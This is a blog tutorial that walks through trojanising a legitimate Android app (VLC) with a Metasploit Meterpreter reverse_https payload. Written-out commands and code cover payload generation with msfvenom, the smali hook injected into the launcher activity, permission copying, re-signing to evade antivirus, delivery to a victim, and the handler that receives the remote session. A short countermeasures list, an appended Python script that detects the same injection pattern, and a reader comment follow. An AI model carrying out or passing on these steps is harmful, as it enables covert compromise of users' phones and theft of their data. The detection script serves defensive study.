The Black Hat Art of Backdooring Android APK | Part 1 | Lucideus Research

Why Android?     (Difficulty: Hard)
Android is the world's most popular smartphone OS, and in India alone approx. 90% of smartphone users have Android running on their devices, whether it is the Lollipop or the Nougat version. Because of this popularity and Android's fragmentation problem, it has become the first choice of cyber criminals to compromise. A large chunk of Android users are not very familiar with Android security, which is another point cyber criminals take advantage of: via social engineering they get users to install backdoored applications, which results in device compromise. In this article we will talk about a popular method cyber criminals are using to backdoor apks.

Pre-Requisites:
Kali Linux. You can use any other OS, but I prefer Kali Linux.
An original APK. I used VLC. Download Link: VLC.

Easy APK Tool. It is basically a GUI version of Apktool, whose CLI version is included in Kali Linux.

Download Link: Easy APK Tool.
Alternate Download Link: Alternative.


Steps to Generate the Meterpreter Payload

Step 1: Generate a payload apk using msfvenom. The command is:
#msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o payload.apk

The available payloads are:
reverse_tcp
reverse_http
reverse_https
I will be using reverse_https, simply because I found it to be more stable.

Step 2: Setup Easy APK Tool
  • Now install or extract the Easy APK Tool.
  • Copy the downloaded original apk and the payload apk to a new folder inside the Easy APK Tool folder. Also create a folder named “Frameworks” in the Easy APK Tool folder.

Now open Easy APK Tool.

Click on Select APK and select the original apk (vlc.apk).

  • In the Framework option, click on Select Framework and select the original apk.
  • Now click on Change in the Install Directory option and select the Frameworks folder we created earlier. Then click on the Install FW APK button.

Step 3: Decompiling the original apk and payload apk
  • After the process is done, go back to the main menu and uncheck all the checkboxes you see beside the big buttons except the “Force delete destination directory” box.
  • Now click on Decompile.
  • After the decompiling is completed, select the payload apk using the Select APK option and click on Decompile (no need to install the framework).

Step 4: Binding Process
  • Copy the payload files (smali files) to the original apk folder.
  • Now open the decompiled payload folder and go to the smali → com folder.
  • Copy the metasploit folder there and paste it into the ...original_apk/smali/com folder. There will already be a folder named “android”. Now there should be 2 folders in the com folder: android and metasploit.


Step 5: Find the main smali file through the AndroidManifest of the original apk.

Now open the original app folder and open the AndroidManifest file using any text editor. I prefer Sublime Text; you can use any other if you like.

Now find the activity tag (line 26) whose intent-filter contains the following two lines:
<action android:name="android.intent.action.MAIN"/> (line 28)
<category android:name="android.intent.category.LAUNCHER"/> (line 29)

When you find it, copy its android:name. Then open a new file and paste it there.

Those two lines we searched for signify that this is the activity which starts when the app is launched from its launcher icon; it is the MAIN activity, similar to the 'main' function in traditional programming.

Now this part is interesting. Did you notice anything about the android:name you copied?
org.videolan.vlc.StartActivity

Notice that if you replace the dots with path separators (backslashes on Windows) you get the path of the StartActivity.smali file:

org\videolan\vlc\StartActivity

Note: The smali file's name is not necessarily StartActivity. Other apps may use a different name, such as MainActivity.

Step 6. Inject the hook into the StartActivity.smali file of the original apk.
Now go to that path and open the StartActivity.smali file with a text editor.
Now search for “;->onCreate(Landroid/os/Bundle;)”.

When you locate it, paste the following code on the line after it:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

And save the file.

Step 7. Inject the permissions into the AndroidManifest.xml file
Now we have to give the app all the permissions for the fun stuff, because right now it can only do things like playing music and videos, which is so boring! We want to do the fun stuff!

So open the AndroidManifest file from the original apk folder and also the AndroidManifest file from the payload folder.

Now copy all the uses-permission lines from the payload AndroidManifest file to the original apk AndroidManifest file.
Make sure there are no duplicates.
Save the original apk AndroidManifest file.

Step 8: Re-compile the original apk
  • Now go back to the Easy APK Tool.
  • Click on the little brown option next to Select APK and select the decompiled original APK folder. Then click on Compile.

After the compiling process is completed, go to the Log output menu and check that there were no big errors; warnings are fine, ignore them. There should not be an error saying “compiling failed” or something like that at the end.



Step 9. Sign and Zipalign the APK

Now for the tricky part. The compiled apk will not install on any Android device because its signature has been removed; if you try to install it, you will get an “unable to parse file/apk” error.

So to fix that error we need to sign and zipalign the apk using the Easy APK Tool; think of it like you are evading an antivirus.
The combo that has worked for me after re-compiling is: sign → zipalign (this produces a new apk; select that one) → sign.


Step 10: Transfer the App and Exploit

Now take the apk and host it on your LAN server using XAMPP, or just transfer the apk to the victim's mobile using any method. I will be using Remix OS in my VM. In your Kali Linux, open the Metasploit Framework.

To start Metasploit, type the following commands in a terminal:
  • msfconsole
  • use exploit/multi/handler
  • set PAYLOAD android/meterpreter/reverse_https
  • set LHOST <your ip>
  • set LPORT <your port>
  • exploit

On the mobile, install the apk; as soon as you open it you will get a Meterpreter session in Metasploit.

Compromised Device Information

Remark: When a user lists all the running processes, only VLC will be listed, whereas the Metasploit payload will not be listed.

Conclusion
We will conclude the article by saying the same things you hear from others too: follow the security measures below to stay safe.
These are some countermeasures which you can use to secure your Android devices:
  • Always use the Google Play Store for installing Android applications.
  • Never download and install any application from an unknown source.
  • Always check the permissions an application is requesting while installing it on the Android phone.
  • Download Unhack if you feel there is some application stealing your stuff, such as SMS or calls.

Sites like apkmania and others may have malware attached like the above. Hence always remember that when you get any paid app from the web, there is a very high probability that cyber criminals have attached malware to it, which nowadays is very difficult to detect.
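As an added defensive check (not part of the original article or of any tool it mentions), the script below audits a decompiled apktool tree for the exact binding pattern described in Steps 4 to 7: a class under smali/com/metasploit/stage, the invoke-static Payload;->start hook in the launcher activity located through the manifest, and the declared uses-permission entries. The sample manifest and smali are constructed in memory for the demonstration and are not taken from the real VLC app.

```python
# Added defensive audit (not from the original article): scan a decompiled apktool
# tree, given as {relative path: text}, for the binding pattern the article describes.
import re
import xml.etree.ElementTree as ET
NS = "{http://schemas.android.com/apk/res/android}"
STAGE_DIR = "smali/com/metasploit/stage/"
# The hook line from Step 6; \s* also tolerates a line break after the comma.
HOOK_RE = re.compile(r"invoke-static\s*\{[^}]*\},\s*Lcom/metasploit/stage/Payload;"
                     r"->start\(Landroid/content/Context;\)V")

def launcher_activities(manifest_xml):
    """android:name of every activity whose intent-filter has MAIN + LAUNCHER (Step 5)."""
    names = []
    for act in ET.fromstring(manifest_xml).iter("activity"):
        for flt in act.iter("intent-filter"):
            actions = {a.get(NS + "name") for a in flt.iter("action")}
            cats = {c.get(NS + "name") for c in flt.iter("category")}
            if "android.intent.action.MAIN" in actions and \
               "android.intent.category.LAUNCHER" in cats:
                names.append(act.get(NS + "name"))
    return names

def smali_path(activity_name):
    """org.videolan.vlc.StartActivity -> smali/org/videolan/vlc/StartActivity.smali"""
    return "smali/" + activity_name.replace(".", "/") + ".smali"

def audit(files):
    """Findings for one tree: stage class present, hooked launcher activities, permissions."""
    manifest = files["AndroidManifest.xml"]
    hooked = [a for a in launcher_activities(manifest)
              if HOOK_RE.search(files.get(smali_path(a), ""))]
    perms = sorted(p.get(NS + "name")
                   for p in ET.fromstring(manifest).iter("uses-permission"))
    return {"stage_class": any(p.startswith(STAGE_DIR) for p in files),
            "hooked_activities": hooked, "permissions": perms}

# Constructed sample tree mimicking the article's result (not the real VLC apk).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
<uses-permission android:name="android.permission.INTERNET"/><uses-permission android:name="android.permission.READ_SMS"/>
<application><activity android:name="org.videolan.vlc.StartActivity"><intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter></activity></application></manifest>"""
SAMPLE_SMALI = """.method protected onCreate(Landroid/os/Bundle;)V
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
.end method"""
SAMPLE_FILES = {"AndroidManifest.xml": SAMPLE_MANIFEST,
                "smali/org/videolan/vlc/StartActivity.smali": SAMPLE_SMALI,
                STAGE_DIR + "Payload.smali": ".class public Lcom/metasploit/stage/Payload;"}
```

Running audit(SAMPLE_FILES) flags the stage class, the hooked StartActivity and the READ_SMS permission that a media player has no reason to request; the same three checks can be run over any apktool output directory by reading its files into the dictionary.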

1 comment:

  1. Hi there,

    Very interesting article, loved it. I would like to ask you a question: I am using APKTOOL to work on apps. I just have a problem with one app that has a call to action for rating when you press back to leave the app; the problem is that when I change the package name, the app shows an error instead of the rating action, "unfortunately app name has stopped". Any help would be very, very appreciated. Thank you